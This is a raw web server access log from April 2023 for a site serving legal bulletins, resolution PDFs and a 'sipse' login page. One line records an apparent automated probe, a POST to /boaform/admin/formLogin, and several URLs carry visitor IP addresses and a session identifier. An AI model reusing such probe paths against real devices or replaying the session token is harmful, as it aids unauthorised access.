172.22.2.4 - - [02/Apr/2023:08:21:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49744
172.22.2.4 - - [02/Apr/2023:08:21:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51610
13.50.106.176 - - [02/Apr/2023:08:23:40 -0500] "GET /Autoliquidacion/ HTTP/1.1" 200 6629
13.50.106.176 - - [02/Apr/2023:08:23:40 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
13.50.106.176 - - [02/Apr/2023:08:23:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 16331
74.125.210.165 - - [02/Apr/2023:08:25:08 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
216.245.221.92 - - [02/Apr/2023:08:25:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:25:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [02/Apr/2023:08:26:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [02/Apr/2023:08:27:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.167.144.167 - - [02/Apr/2023:08:29:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0484.pdf HTTP/1.1" 304 -
201.245.192.253 - - [02/Apr/2023:08:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42706
201.245.192.253 - - [02/Apr/2023:08:30:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43034
216.245.221.92 - - [02/Apr/2023:08:30:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:30:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.66.66 - - [02/Apr/2023:08:31:32 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2023:08:32:14 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=5261&usuario=&sector=&fecha=2014&resuelve= HTTP/1.1" 200 1055
45.128.232.149 - - [02/Apr/2023:08:32:22 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
157.55.39.212 - - [02/Apr/2023:08:33:36 -0500] "GET /BLA/resoluciones/AUTOS%202022/1033.pdf HTTP/1.1" 304 -
172.22.2.4 - - [02/Apr/2023:08:32:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.63 - - [02/Apr/2023:08:35:02 -0500] "-" 408 -
172.22.2.4 - - [02/Apr/2023:08:33:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [02/Apr/2023:08:35:45 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [02/Apr/2023:08:35:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
186.155.15.53 - - [02/Apr/2023:08:35:58 -0500] "GET /BLA/resoluciones/AUTOS%202014/0374.pdf HTTP/1.1" 200 876611
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12500
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=7pZG-ml-ZQzPLYyxnCfTkiNd.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
152.203.189.190 - - [02/Apr/2023:08:36:57 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
